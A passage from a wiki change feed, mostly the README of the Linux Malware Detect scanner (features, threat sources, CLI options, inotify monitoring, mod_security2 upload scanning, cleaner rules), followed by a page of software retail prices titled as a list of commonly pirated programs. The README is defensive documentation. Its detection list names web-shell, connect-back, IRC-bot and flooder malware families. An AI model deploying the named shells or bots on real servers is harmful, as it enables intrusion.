- scan-recent option to scan only files that have been added/changed in X days&lt;br /&gt;
- scan-all option for full path based scanning&lt;br /&gt;
- checkout option to upload suspected malware to rfxn.com for review / hashing&lt;br /&gt;
- full reporting system to view current and previous scan results&lt;br /&gt;
- quarantine queue that stores threats in a safe fashion with no permissions&lt;br /&gt;
- quarantine batching option to quarantine the results of a current or past scans&lt;br /&gt;
- quarantine restore option to restore files to original path, owner and perms&lt;br /&gt;
- quarantine suspend account option to Cpanel suspend or shell revoke users&lt;br /&gt;
- cleaner rules to attempt removal of malware injected strings&lt;br /&gt;
- cleaner batching option to attempt cleaning of previous scan reports&lt;br /&gt;
- cleaner rules to remove base64 and gzinflate(base64 injected malware&lt;br /&gt;
- daily cron based scanning of all changes in last 24h in user homedirs&lt;br /&gt;
- daily cron script compatible with stock RH style systems, Cpanel &amp;amp; Ensim&lt;br /&gt;
- kernel based inotify real time file scanning of created/modified/moved files&lt;br /&gt;
- kernel inotify monitor that can take path data from STDIN or FILE&lt;br /&gt;
- kernel inotify monitor convenience feature to monitor system users&lt;br /&gt;
- kernel inotify monitor can be restricted to a configurable user html root&lt;br /&gt;
- kernel inotify monitor with dynamic sysctl limits for optimal performance&lt;br /&gt;
- kernel inotify alerting through daily and/or optional weekly reports&lt;br /&gt;
- HTTP upload scanning through mod_security2 inspectFile hook&lt;br /&gt;
- e-mail alert reporting after every scan execution (manual &amp;amp; daily)&lt;br /&gt;
- path, extension and signature based ignore options&lt;br /&gt;
- background scanner option for unattended scan operations&lt;br /&gt;
- verbose logging &amp;amp; output of all actions&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
.: 3 [ THREAT SOURCE DATA ]&lt;br /&gt;
&lt;br /&gt;
The defining difference with LMD is that it doesn&#039;t just detect malware based &lt;br /&gt;
on signatures/hashes that someone else generated but rather it is an &lt;br /&gt;
encompassing project that actively tracks in the wild threats and generates &lt;br /&gt;
signatures based on those real world threats that are currently circulating.&lt;br /&gt;
&lt;br /&gt;
There are four main sources for malware data that is used to generate LMD &lt;br /&gt;
signatures:&lt;br /&gt;
- Network Edge IPS: The network I manage hosts over 35,000 web sites and as &lt;br /&gt;
such receives a large amount of daily abuse, all of which is logged by our &lt;br /&gt;
network edge IPS. The IPS events are processed to extract malware url&#039;s, &lt;br /&gt;
decode POST payload and base64/gzip encoded abuse data and ultimately that &lt;br /&gt;
malware is retrieved, reviewed, classified and then signatures generated as &lt;br /&gt;
appropriate. The vast majority of LMD signatures have been derived from IPS &lt;br /&gt;
extracted data.&lt;br /&gt;
- Community Data: Data is aggregated from multiple community malware websites &lt;br /&gt;
such as clean-mx and malwaredomainlist then processed to retrieve new &lt;br /&gt;
malware, review, classify and then generate signatures.&lt;br /&gt;
- ClamAV: The HEX &amp;amp; MD5 detection signatures from ClamAV are monitored for &lt;br /&gt;
relevant updates that apply to the target user group of LMD and added to the &lt;br /&gt;
project as appropriate. To date there has been roughly 400 signatures ported &lt;br /&gt;
from ClamAV while the LMD project has contributed back to ClamAV by &lt;br /&gt;
submitting over 1,100 signatures and continues to do so on an ongoing basis.&lt;br /&gt;
- User Submission: LMD has a checkout feature that allows users to submit &lt;br /&gt;
suspected malware for review, this has grown into a very popular feature and &lt;br /&gt;
generates on average about 30-50 submissions per week.&lt;br /&gt;
&lt;br /&gt;
.: 4 [ RELEASE UPDATES ]&lt;br /&gt;
Updates to the release version of LMD are not automatically installed but can&lt;br /&gt;
be installed using the --update-ver option. There is good reasons that this is&lt;br /&gt;
not done automatically and I really dont feel like listing them so just think&lt;br /&gt;
about it a bit.&lt;br /&gt;
&lt;br /&gt;
The latest changes in the release version can always be viewed at:&lt;br /&gt;
http://www.rfxn.com/appdocs/CHANGELOG.maldetect&lt;br /&gt;
&lt;br /&gt;
.: 4.1 [ SIGNATURE UPDATES ]&lt;br /&gt;
&lt;br /&gt;
The LMD signatures are updated typically once per day or more frequently&lt;br /&gt;
depending on incoming threat data from the LMD checkout feature, IPS malware&lt;br /&gt;
extraction and other sources. The updating of signatures in LMD installations&lt;br /&gt;
is performed daily through the default cron.daily script with the --update&lt;br /&gt;
option, which can be run manually at any time.&lt;br /&gt;
&lt;br /&gt;
An RSS &amp;amp; XML data source is available for tracking malware threat updates:&lt;br /&gt;
RSS Recent Signatures: http://www.rfxn.com/api/lmd&lt;br /&gt;
XML Recent Signatures: http://www.rfxn.com/api/lmd?id=recent&lt;br /&gt;
XML All Signatures:    http://www.rfxn.com/api/lmd?id=all&lt;br /&gt;
&lt;br /&gt;
.: 5 [ DETECTED THREATS ]&lt;br /&gt;
&lt;br /&gt;
LMD 1.4.1 has a total of 7,241 (5393 MD5 / 1848 HEX) signatures (before updates),&lt;br /&gt;
below is a listing of the top 60 threats by prevalence detected by LMD.&lt;br /&gt;
&lt;br /&gt;
base64.inject.unclassed    bin.dccserv.irsexxy      bin.fakeproc.Xnuxer&lt;br /&gt;
bin.ircbot.nbot            bin.ircbot.php3          bin.ircbot.unclassed&lt;br /&gt;
bin.pktflood.ABC123        bin.pktflood.osf         bin.trojan.linuxsmalli&lt;br /&gt;
c.ircbot.tsunami           exp.linux.rstb           exp.linux.unclassed&lt;br /&gt;
exp.setuid0.unclassed      gzbase64.inject          html.phishing.auc61&lt;br /&gt;
html.phishing.hsbc         perl.connback.DataCha0s  perl.connback.N2&lt;br /&gt;
perl.cpanel.cpwrap         perl.mailer.yellsoft     perl.ircbot.atrixteam&lt;br /&gt;
perl.ircbot.bRuNo          perl.ircbot.Clx          perl.ircbot.devil&lt;br /&gt;
perl.ircbot.fx29           perl.ircbot.magnum       perl.ircbot.oldwolf&lt;br /&gt;
perl.ircbot.putr4XtReme    perl.ircbot.rafflesia    perl.ircbot.UberCracker&lt;br /&gt;
perl.ircbot.xdh            perl.ircbot.xscan        perl.shell.cbLorD&lt;br /&gt;
perl.shell.cgitelnet       php.cmdshell.c100        php.cmdshell.c99&lt;br /&gt;
php.cmdshell.cih           php.cmdshell.egyspider   php.cmdshell.fx29&lt;br /&gt;
php.cmdshell.ItsmYarD      php.cmdshell.Ketemu      php.cmdshell.N3tshell&lt;br /&gt;
php.cmdshell.r57           php.cmdshell.unclassed   php.defash.buno&lt;br /&gt;
php.exe.globals            php.include.remote       php.ircbot.InsideTeam&lt;br /&gt;
php.ircbot.lolwut          php.ircbot.sniper        php.ircbot.vj_denie&lt;br /&gt;
php.mailer.10hack          php.mailer.bombam        php.mailer.PostMan&lt;br /&gt;
php.phishing.AliKay        php.phishing.mrbrain     php.phishing.ReZulT&lt;br /&gt;
php.pktflood.oey           php.shell.rc99           php.shell.shellcomm&lt;br /&gt;
&lt;br /&gt;
.: 6 [ THREAT SHARING ]&lt;br /&gt;
&lt;br /&gt;
I am a firm believer in not reinventing the wheel, for my own sanity or that&lt;br /&gt;
of others. As such all unique theat data is submitted to CYMRU &amp;amp; ClamAV so&lt;br /&gt;
that the open source and anti-malware community at large can grow from this&lt;br /&gt;
project.&lt;br /&gt;
&lt;br /&gt;
.: 7 [ CONFIGURATION ]&lt;br /&gt;
&lt;br /&gt;
The configuration of LMD is handled through /usr/local/maldetect/conf.maldet&lt;br /&gt;
and all options are well commented for ease of configuration.&lt;br /&gt;
&lt;br /&gt;
By default LMD has the auto-qurantine of files disabled, this will mean that&lt;br /&gt;
YOU WILL NEED TO ACT on any threats detected or pass the SCANID to the &#039;-q&#039;&lt;br /&gt;
option to batch quarantine the results. To change this please set quar_hits=1&lt;br /&gt;
in conf.maldet.&lt;br /&gt;
&lt;br /&gt;
.: 8 [ IGNORE OPTIONS ]&lt;br /&gt;
&lt;br /&gt;
There are four ignore files available and they break down as follows:&lt;br /&gt;
&lt;br /&gt;
/usr/local/maldetect/ignore_paths&lt;br /&gt;
A line spaced file for paths that are to be execluded from search results&lt;br /&gt;
 Sample ignore entry:&lt;br /&gt;
 /home/user/public_html/cgi-bin&lt;br /&gt;
&lt;br /&gt;
/usr/local/maldetect/ignore_file_ext&lt;br /&gt;
A line spaced file for file extensions to be excluded from search results&lt;br /&gt;
 Sample ignore entry:&lt;br /&gt;
 .js&lt;br /&gt;
 .css&lt;br /&gt;
&lt;br /&gt;
/usr/local/maldetect/ignore_sigs&lt;br /&gt;
A line spaced file for signatures that should be removed from file scanning&lt;br /&gt;
 Sample ignore entry:&lt;br /&gt;
 base64.inject.unclassed&lt;br /&gt;
&lt;br /&gt;
/usr/local/maldetect/ignore_inotify&lt;br /&gt;
A line spaced file for regexp paths that are excluded from inotify monitoring&lt;br /&gt;
 Sample ignore entry:&lt;br /&gt;
 ^/home/user$&lt;br /&gt;
 ^/var/tmp/#sql_.*\.MYD$&lt;br /&gt;
&lt;br /&gt;
.: 9 [ CLI USAGE ]&lt;br /&gt;
&lt;br /&gt;
Once LMD is installed it can be run through the &#039;maldet&#039; command, the &#039;--help&#039;&lt;br /&gt;
option gives a detailed summary of usage options:&lt;br /&gt;
&lt;br /&gt;
    -b, --background&lt;br /&gt;
      Execute operations in the background, ideal for large scans&lt;br /&gt;
      e.g: maldet -b -r /home/?/public_html 7&lt;br /&gt;
&lt;br /&gt;
    -u, --update&lt;br /&gt;
       Update malware detection signatures from rfxn.com&lt;br /&gt;
&lt;br /&gt;
    -d, --update-ver&lt;br /&gt;
       Update the installed version from rfxn.com&lt;br /&gt;
&lt;br /&gt;
    -m, --monitor USERS|PATHS|FILE&lt;br /&gt;
       Run maldet with inotify kernel level file create/modify monitoring&lt;br /&gt;
       If USERS is specified, monitor user homedirs for UID&#039;s &amp;gt; 500&lt;br /&gt;
       If FILE is specified, paths will be extracted from file, line spaced&lt;br /&gt;
       If PATHS are specified, must be comma spaced list, NO WILDCARDS!&lt;br /&gt;
       e.g: maldet --monitor users&lt;br /&gt;
       e.g: maldet --monitor /root/monitor_paths&lt;br /&gt;
       e.g: maldet --monitor /home/mike,/home/ashton&lt;br /&gt;
&lt;br /&gt;
    -k, --kill&lt;br /&gt;
       Terminate inotify monitoring service&lt;br /&gt;
&lt;br /&gt;
    -r, --scan-recent PATH DAYS&lt;br /&gt;
       Scan files created/modified in the last X days (default: 7d, wildcard: ?)&lt;br /&gt;
       e.g: maldet -r /home/?/public_html 2&lt;br /&gt;
&lt;br /&gt;
    -a, --scan-all PATH&lt;br /&gt;
       Scan all files in path (default: /home, wildcard: ?)&lt;br /&gt;
       e.g: maldet -a /home/?/public_html&lt;br /&gt;
&lt;br /&gt;
    -c, --checkout FILE&lt;br /&gt;
       Upload suspected malware to rfxn.com for review &amp;amp; hashing into signatures&lt;br /&gt;
&lt;br /&gt;
    -l, --log&lt;br /&gt;
       View maldet log file events&lt;br /&gt;
&lt;br /&gt;
    -e, --report SCANID email&lt;br /&gt;
       View scan report of most recent scan or of a specific SCANID and optionally&lt;br /&gt;
       e-mail the report to a supplied e-mail address&lt;br /&gt;
       e.g: maldet --report&lt;br /&gt;
       e.g: maldet --report list&lt;br /&gt;
       e.g: maldet --report 050910-1534.21135&lt;br /&gt;
       e.g: maldet --report SCANID user@domain.com&lt;br /&gt;
&lt;br /&gt;
    -s, --restore FILE|SCANID&lt;br /&gt;
       Restore file from quarantine queue to orginal path or restore all items from&lt;br /&gt;
       a specific SCANID&lt;br /&gt;
       e.g: maldet --restore /usr/local/maldetect/quarantine/config.php.23754&lt;br /&gt;
       e.g: maldet --restore 050910-1534.21135&lt;br /&gt;
&lt;br /&gt;
    -q, --quarantine SCANID&lt;br /&gt;
       Quarantine all malware from report SCANID&lt;br /&gt;
       e.g: maldet --quarantine 050910-1534.21135&lt;br /&gt;
&lt;br /&gt;
    -n, --clean SCANID&lt;br /&gt;
       Try to clean &amp;amp; restore malware hits from report SCANID&lt;br /&gt;
       e.g: maldet --clean 050910-1534.21135&lt;br /&gt;
&lt;br /&gt;
    -U, --user USER&lt;br /&gt;
       Set execution under specified user, ideal for restoring from user quarantine or&lt;br /&gt;
       to view user reports.&lt;br /&gt;
       e.g: maldet --user nobody --report&lt;br /&gt;
       e.g: maldet --user nobody --restore 050910-1534.21135&lt;br /&gt;
&lt;br /&gt;
    -co, --config-option VAR1=VALUE,VAR2=VALUE,VAR3=VALUE&lt;br /&gt;
       Set or redefine the value of conf.maldet config options&lt;br /&gt;
       e.g: maldet --config-option email_addr=you@domain.com,quar_hits=1&lt;br /&gt;
&lt;br /&gt;
    -p, --purge&lt;br /&gt;
       Clear logs, quarantine queue, session and temporary data.&lt;br /&gt;
&lt;br /&gt;
.: 10 [ CRON DAILY ]&lt;br /&gt;
&lt;br /&gt;
The cronjob installed by LMD is located at /etc/cron.daily/maldet and is used&lt;br /&gt;
to perform a daily update of signatures, keep the session, temp and quarantine&lt;br /&gt;
data to no more than 14d old and run a daily scan of recent file system changes.&lt;br /&gt;
&lt;br /&gt;
The daily scan supports Ensim virtual roots or standard Linux /home*/user paths,&lt;br /&gt;
such as Cpanel. The default is to just scan the web roots daily, which breaks&lt;br /&gt;
down as /home*/*/public_html or on Ensim /home/virtual/*/fst/var/www/html and&lt;br /&gt;
/home/virtual/*/fst/home/*/public_html.&lt;br /&gt;
&lt;br /&gt;
If you are running monitor mode, the daily scans will be skipped and instead a&lt;br /&gt;
daily report will be issued for all monitoring events. If you need to scan&lt;br /&gt;
additional paths, you should review the cronjob and edit it accordingly.&lt;br /&gt;
&lt;br /&gt;
.: 11 [ INOTIFY MONITORING ]&lt;br /&gt;
&lt;br /&gt;
The inotify monitoring feature is designed to monitor users in real-time for&lt;br /&gt;
file creation/modify/move operations. This option requires a kernel that&lt;br /&gt;
supports inotify_watch (CONFIG_INOTIFY) which is found in kernels 2.6.13+&lt;br /&gt;
and CentOS/RHEL 5 by default. If you are running CentOS 4 you should consider&lt;br /&gt;
an inbox upgrade with: http://www.rfxn.com/upgrade-centos-4-8-to-5-3/&lt;br /&gt;
&lt;br /&gt;
There are three modes that the monitor can be executed with and they relate&lt;br /&gt;
to what will be monitored, they are USERS|PATHS|FILES. &lt;br /&gt;
       e.g: maldet --monitor users&lt;br /&gt;
       e.g: maldet --monitor /root/monitor_paths&lt;br /&gt;
       e.g: maldet --monitor /home/mike,/home/ashton&lt;br /&gt;
&lt;br /&gt;
The options break down as follows:&lt;br /&gt;
USERS -  The users option will take the homedirs of all system users that are&lt;br /&gt;
         above inotify_minuid and monitor them. If inotify_webdir is set then&lt;br /&gt;
         the users webdir, if it exists, will only be monitored.&lt;br /&gt;
PATHS -  A comma spaced list of paths to monitor&lt;br /&gt;
FILE  -  A line spaced file list of paths to monitor&lt;br /&gt;
&lt;br /&gt;
Once you start maldet in monitor mode, it will preprocess the paths based on&lt;br /&gt;
the option specified followed by starting the inotify process. The starting of&lt;br /&gt;
the inotify process can be a time consuming task as it needs to setup a monitor&lt;br /&gt;
hook for every file under the monitored paths. Although the startup process can&lt;br /&gt;
impact the load temporarily, once the process has started it maintains all of&lt;br /&gt;
its resources inside kernel memory and has a very small userspace footprint in&lt;br /&gt;
memory or cpu usage.&lt;br /&gt;
&lt;br /&gt;
The scanner component of the monitor watches for notifications from the inotify&lt;br /&gt;
process and batches items to be scanned, by default, every 30 seconds. If you&lt;br /&gt;
need tighter control of the scanning timer, you can edit inotify_stime in&lt;br /&gt;
conf.maldet.&lt;br /&gt;
&lt;br /&gt;
The alerting of file hits under monitor mode is handled through a daily report&lt;br /&gt;
instead of sending an email on every hit. The cron.daily job installed by LMD&lt;br /&gt;
will call an --alert-daily flag and send an alert for the last days hits. There&lt;br /&gt;
is also an --alert-weekly option that can be used, simply edit the cron at&lt;br /&gt;
/etc/cron.daily/maldet and change the --alert-daily to --alert-weekly.&lt;br /&gt;
&lt;br /&gt;
Terminating the inotify monitoring is done by passing the &#039;-k|--kill-monitor&#039;&lt;br /&gt;
option to maldet, it will touch a file handle monitored by maldet and on the&lt;br /&gt;
next waking cycle of the monitor service, it will terminate itself and all&lt;br /&gt;
inotify processes.&lt;br /&gt;
&lt;br /&gt;
.: 12 [ MODSECURITY2 UPLOAD SCANNING ]&lt;br /&gt;
&lt;br /&gt;
The support for HTTP upload scanning is provided through mod_security2&#039;s inspectFile hook.&lt;br /&gt;
This feature allows for a validation script to be used in permitting or denying an upload. &lt;br /&gt;
&lt;br /&gt;
The convenience script to faciliate this is called modsec.sh and is located in the&lt;br /&gt;
/usr/local/maldetect installation path. The default setup is to run a standard maldet scan&lt;br /&gt;
with no clamav support, no cleaner rule executions and quarantining enabled; these options&lt;br /&gt;
are set in the interest of performance vs accuracy which is a fair tradeoff. &lt;br /&gt;
&lt;br /&gt;
The scan options can be modified in the modsec.sh file if so desired, the default&lt;br /&gt;
scan options are as follows:&lt;br /&gt;
--config-option quar_hits=1,quar_clean=0,clamav_scan=0 --modsec -a &amp;quot;$file&amp;quot;&lt;br /&gt;
&lt;br /&gt;
There is a tangible performance difference in disabling clamav scanning in this usage&lt;br /&gt;
scenario. The native LMD scanner engine is much faster than the clamav scanner engine&lt;br /&gt;
in single file scans by a wide margin. A single file scan using clamav takes roughly&lt;br /&gt;
3sec on average while the LMD scanner engine takes 0.5sec or less.&lt;br /&gt;
&lt;br /&gt;
To enable upload scanning with mod_security2 you must set enable the public_scan option&lt;br /&gt;
in conf.maldet (public_scan=1) then add the following rules to your mod_security2 &lt;br /&gt;
configuration. These rules are best placed in your modsec2.user.conf file on cpanel servers&lt;br /&gt;
or at the top of the appropraite rules file for your setup.&lt;br /&gt;
&lt;br /&gt;
/usr/local/apache/conf/modsec2.user.conf (or similar mod_security2 rules file):&lt;br /&gt;
SecRequestBodyAccess On&lt;br /&gt;
SecRule FILES_TMPNAMES &amp;quot;@inspectFile /usr/local/maldetect/modsec.sh&amp;quot; \&lt;br /&gt;
                &amp;quot;log,auditlog,deny,severity:2,phase:2,t:none&amp;quot;&lt;br /&gt;
&lt;br /&gt;
A restart of the HTTPd service is required following these changes.&lt;br /&gt;
&lt;br /&gt;
When an upload takes place that is determined to be malware, it will be rejected and an&lt;br /&gt;
entry will appear in the mod_security2 SecAuditLog file. On cpanel servers and most&lt;br /&gt;
configurations this is the modsec_audit.log located under /usr/local/apache/logs or &lt;br /&gt;
/var/log/httpd.&lt;br /&gt;
&lt;br /&gt;
The log entry will appear similar to the following:&lt;br /&gt;
Message: Access denied with code 406 (phase 2). File &amp;quot;/tmp/20111120-....-file&amp;quot; rejected by&lt;br /&gt;
the approver script &amp;quot;/usr/local/maldetect/modsec.sh&amp;quot;: 0 maldet: {HEX}php.cmdshell.r57.317&lt;br /&gt;
/tmp/20111120-....-file [file &amp;quot;/usr/local/apache/conf/modsec2.user.conf&amp;quot;] [line &amp;quot;3&amp;quot;]&lt;br /&gt;
[severity &amp;quot;CRITICAL&amp;quot;]&lt;br /&gt;
&lt;br /&gt;
The default alerting options will apply and an e-mail will be sent when hits are found. This&lt;br /&gt;
can be changed in the modsec.sh script by editing the --config-option values.&lt;br /&gt;
&lt;br /&gt;
To disable alerts append email_alert=0 to the --config-option values:&lt;br /&gt;
--config-option quar_hits=1,quar_clean=0,clamav_scan=0,email_alert=0&lt;br /&gt;
&lt;br /&gt;
To change the e-mail address for alerts on upload hits, append email_addr=you@domain.com&lt;br /&gt;
to the --config-option values:&lt;br /&gt;
--config-option quar_hits=1,quar_clean=0,clamav_scan=0,email_addr=you@domain.com&lt;br /&gt;
&lt;br /&gt;
The nature of uploads is such that they are performed either under the user that the HTTP&lt;br /&gt;
service is running as or under that of a system user in an suexec style setup (i.e: phpsuexec).&lt;br /&gt;
This required a change to the way LMD stores session, temporary and quarantine data to allow&lt;br /&gt;
for non-root users to perform scans.&lt;br /&gt;
&lt;br /&gt;
Given that the maldetect installation path is owned by user root, we either need to set a pub&lt;br /&gt;
path world writable (777) or populate the pub path with user owned paths. It was undesirable&lt;br /&gt;
to set any path world writable and as such a feature to populate path data was created. This&lt;br /&gt;
feature is controlled with the --mkpubpaths flag and is executed from cron every 10 minutes,&lt;br /&gt;
it will only execute if the public_scan variable is enabled in conf.maldet. As such, it is&lt;br /&gt;
important to make sure the public_scan variable is set to enabled (1) in conf.maldet and it is&lt;br /&gt;
advised to run &#039;maldet --mkpubpaths&#039; manually to prepopulate the user paths. There after, the&lt;br /&gt;
cron will ensure new users have paths created no later than 10 minutes after creation.&lt;br /&gt;
&lt;br /&gt;
All non-root scans, such as those performed under mod_security2, will be stored under the&lt;br /&gt;
/usr/local/maldetect/pub/username directory tree. The quarantine paths are relative to the user&lt;br /&gt;
that exectues the scan, so user nobody would be under pub/nobody/quar/. The actual paths&lt;br /&gt;
for where files are quarantined and the user which executed the scan, can be verified in the&lt;br /&gt;
e-mail reports for upload hits.&lt;br /&gt;
&lt;br /&gt;
To restore files quarantined under non-root users, you must pass the -U|--user option to LMD,&lt;br /&gt;
for example if user nobody quarantined a file you would like to restore, it can be restored as&lt;br /&gt;
follows:&lt;br /&gt;
maldet --user nobody /usr/local/maldetect/pub/nobody/quar/20111120-file-SFwTeu.22408&lt;br /&gt;
&lt;br /&gt;
Or, as always the scan ID can be used to restore&lt;br /&gt;
maldet --user nobody 112011-0032.13771&lt;br /&gt;
&lt;br /&gt;
.: 13 [ CLEANER RULES ]&lt;br /&gt;
&lt;br /&gt;
The cleaner function looks for signature-named rules under the clean/ path,&lt;br /&gt;
these rules can consist of any command that is designed to clean a file of&lt;br /&gt;
malware. A cleaner rule must result in a file being able to pass a scan&lt;br /&gt;
without tripping a HIT otherwise it will classify the clean action as FAILED.&lt;br /&gt;
&lt;br /&gt;
Let us assume for a moment we have malware that we want to clean and it trips&lt;br /&gt;
with the signature &amp;quot;{HEX}php.cmdshell.r57.89&amp;quot;. The actual signature string in&lt;br /&gt;
this is &amp;quot;php.cmdshell.r57&amp;quot;, the &amp;quot;{HEX}&amp;quot; just defines the format and &amp;quot;.89&amp;quot; is&lt;br /&gt;
the variant number. So, to create a clean rule for php.cmdshell.r57 we would&lt;br /&gt;
add a file &#039;clean/php.cmdshell.r57&#039; and this would be executed against any&lt;br /&gt;
file that hits on the signature of the same name.&lt;br /&gt;
&lt;br /&gt;
The actual contents of the rule should be a single line command that will be&lt;br /&gt;
executed against the hit file, for example the execution looks something like:&lt;br /&gt;
&lt;br /&gt;
YOUR_COMMAND MALWARE_FILE&lt;br /&gt;
&lt;br /&gt;
So, for a string based malware injection you could easily throw in a &#039;sed -i&#039;&lt;br /&gt;
into the rule file with the appropriate pattern to strip the string(s) from&lt;br /&gt;
the file. Once the clean command has run, a rescan will be performed on the&lt;br /&gt;
file and if it causes causes a hit, the clean will be marked as FAILED. A&lt;br /&gt;
successful clean ALWAYS results in the file being restored if possible to&lt;br /&gt;
its original path, owner and mode.&lt;br /&gt;
&lt;br /&gt;
An important note is that the cleaner function is a subfunction of the&lt;br /&gt;
quarantine, so if the quarantine is disabled then by default, malware hits&lt;br /&gt;
will not have clean attempts made. There are two ways around this, apart from&lt;br /&gt;
the obvious of turning on quarantine and rescanning (which is a waste of time).&lt;br /&gt;
The best way is to enable the quarantine and then use the -q|--quarantine flag&lt;br /&gt;
to batch through the scan results, which will quarantine and clean files. The&lt;br /&gt;
second is to use the -n|--clean flag which will try to clean files in place,&lt;br /&gt;
be that in the quarantine or the files original path, wherever it can be found.&lt;br /&gt;
&lt;br /&gt;
e.g: maldet -q SCANID&lt;br /&gt;
e.g: maldet --clean SCANID&lt;br /&gt;
&lt;br /&gt;
==Pranala Luar==&lt;br /&gt;
 http://www.rfxn.com/appdocs/README.maldetect&lt;/div&gt;</summary>
		<author><name>Adinugroho</name></author>
	</entry>
	<entry>
		<id>https://lms.onnocenter.or.id/wiki/index.php?title=Daftar_Software_Yang_Biasa_Dibajak&amp;diff=28719</id>
		<title>Daftar Software Yang Biasa Dibajak</title>
		<link rel="alternate" type="text/html" href="https://lms.onnocenter.or.id/wiki/index.php?title=Daftar_Software_Yang_Biasa_Dibajak&amp;diff=28719"/>
		<updated>2011-12-15T15:03:18Z</updated>

		<summary type="html">&lt;p&gt;Adinugroho: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt; Microsoft Windows XP Home Edition Upgrade with SP2 $138.99&lt;br /&gt;
 Microsoft Windows XP Professional Full Version with SP2 $247.52&lt;br /&gt;
 Microsoft Windows 7 Home Premium $187.64&lt;br /&gt;
 Microsoft Windows 7 Professional $238.75&lt;br /&gt;
 Microsoft Windows 7 Ultimate $245.99&lt;br /&gt;
 Windows Server Standard 2008 R2 with SP1 x64 1pack DSP OEI 1-4CPU 5 Client $729.99&lt;br /&gt;
 Microsoft Windows Server 2008 5-Client Additional License $167.90&lt;br /&gt;
 Microsoft Windows Small Business Server Standard 2011 64Bit 1 Pack DSP OEI DVD 1-4CPU 5 Clt $759.99&lt;br /&gt;
&lt;br /&gt;
 Macromedia Dreamweaver 8 Win/Mac [OLD VERSION]  $404.91&lt;br /&gt;
 Macromedia Dreamweaver MX $199.99&lt;br /&gt;
 Adobe Dreamweaver CS5.5 $383.00&lt;br /&gt;
 Adobe Photoshop Elements and Premiere Elements 10 $84.99&lt;br /&gt;
 Adobe Acrobat X Standard     $264.84&lt;br /&gt;
 Adobe Photoshop Lightroom 3 $196.95&lt;br /&gt;
 Adobe CS5.5 Design Premium Student and Teacher Edition $425.98&lt;br /&gt;
 Adobe Photoshop Elements 10     $64.99&lt;br /&gt;
&lt;br /&gt;
 Microsoft Office Home and Business 2010 (Disc Version) $219.99&lt;br /&gt;
 Microsoft Office Home and Student 2007 [Old Version] $95.99&lt;br /&gt;
 Microsoft Office Professional 2003 - Old Version $189.99&lt;br /&gt;
&lt;br /&gt;
 Kaspersky Internet Security 2012 - 3 Users $19.99&lt;br /&gt;
 Norton 360 5.0 1-User/3PCs $31.22&lt;br /&gt;
 Norton Internet Security 2012 - 1 User 3PC $25.99&lt;br /&gt;
 McAfee Total Protection 2012--3 Users $23.49&lt;br /&gt;
 AVG Internet Security 2012 3 User $28.36&lt;br /&gt;
 AVG Internet Security 2011 (1-User) $34.88&lt;br /&gt;
&lt;br /&gt;
 Corel PaintShop Pro X4 Ultimate $45.02&lt;br /&gt;
 CorelDRAW Graphics Suite X5 $217.99&lt;br /&gt;
&lt;br /&gt;
 ACDSee 10 Photo Manager ACDSee 10 Photo Manager $197.50&lt;br /&gt;
 Adobe Premiere Elements 10 $49.99 	&lt;br /&gt;
 Autodesk Maya 2012 -- Includes 1 year Autodesk Subscription $3,495.00&lt;br /&gt;
 Autodesk 3ds Max 2011: 3D Animation/Designing Soft $999.00  	 &lt;br /&gt;
 Visual Studio 2010 Professional $674.00 	 &lt;br /&gt;
 Microsoft Visual Studio 6.0 Professional Edition  $649.00 	 &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Pranala Luar==&lt;br /&gt;
 http://adinugroho.web.id/tutorial/windows/daftar-software-yang-biasa-dibajak.html&lt;br /&gt;
 http://www.amazon.com&lt;/div&gt;</summary>
		<author><name>Adinugroho</name></author>
	</entry>
	<entry>
		<id>https://lms.onnocenter.or.id/wiki/index.php?title=Daftar_Software_Yang_Biasa_Dibajak&amp;diff=28718</id>
		<title>Daftar Software Yang Biasa Dibajak</title>
		<link rel="alternate" type="text/html" href="https://lms.onnocenter.or.id/wiki/index.php?title=Daftar_Software_Yang_Biasa_Dibajak&amp;diff=28718"/>
		<updated>2011-12-15T14:49:23Z</updated>

		<summary type="html">&lt;p&gt;Adinugroho: New page:  Microsoft Windows XP Home Edition Upgrade with SP2 $138.99  Microsoft Windows XP Professional Full Version with SP2 $247.52  Microsoft Windows 7 Home Premium $187.64  Microsoft Windows 7 ...&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt; Microsoft Windows XP Home Edition Upgrade with SP2 $138.99&lt;br /&gt;
 Microsoft Windows XP Professional Full Version with SP2 $247.52&lt;br /&gt;
 Microsoft Windows 7 Home Premium $187.64&lt;br /&gt;
 Microsoft Windows 7 Professional $238.75&lt;br /&gt;
 Microsoft Windows 7 Ultimate $245.99&lt;br /&gt;
 Windows Server Standard 2008 R2 with SP1 x64 1pack DSP OEI 1-4CPU 5 Client $729.99&lt;br /&gt;
 Microsoft Windows Server 2008 5-Client Additional License $167.90&lt;br /&gt;
 Microsoft Windows Small Business Server Standard 2011 64Bit 1 Pack DSP OEI DVD 1-4CPU 5 Clt $759.99&lt;br /&gt;
&lt;br /&gt;
 Macromedia Dreamweaver 8 Win/Mac [OLD VERSION]  $404.91&lt;br /&gt;
 Macromedia Dreamweaver MX $199.99&lt;br /&gt;
 Adobe Dreamweaver CS5.5 $383.00&lt;br /&gt;
 Adobe Photoshop Elements and Premiere Elements 10 $84.99&lt;br /&gt;
 Adobe Acrobat X Standard     $264.84&lt;br /&gt;
 Adobe Photoshop Lightroom 3 $196.95&lt;br /&gt;
 Adobe CS5.5 Design Premium Student and Teacher Edition $425.98&lt;br /&gt;
 Adobe Photoshop Elements 10     $64.99&lt;br /&gt;
&lt;br /&gt;
 Microsoft Office Home and Business 2010 (Disc Version) $219.99&lt;br /&gt;
 Microsoft Office Home and Student 2007 [Old Version] $95.99&lt;br /&gt;
 Microsoft Office Professional 2003 - Old Version $189.99&lt;br /&gt;
&lt;br /&gt;
 Kaspersky Internet Security 2012 - 3 Users $19.99&lt;br /&gt;
 Norton 360 5.0 1-User/3PCs $31.22&lt;br /&gt;
 Norton Internet Security 2012 - 1 User 3PC $25.99&lt;br /&gt;
 McAfee Total Protection 2012--3 Users $23.49&lt;br /&gt;
 AVG Internet Security 2012 3 User $28.36&lt;br /&gt;
 AVG Internet Security 2011 (1-User) $34.88&lt;br /&gt;
&lt;br /&gt;
 Corel PaintShop Pro X4 Ultimate $45.02&lt;br /&gt;
 CorelDRAW Graphics Suite X5 $217.99&lt;br /&gt;
&lt;br /&gt;
 ACDSee 10 Photo Manager ACDSee 10 Photo Manager $197.50&lt;br /&gt;
&lt;br /&gt;
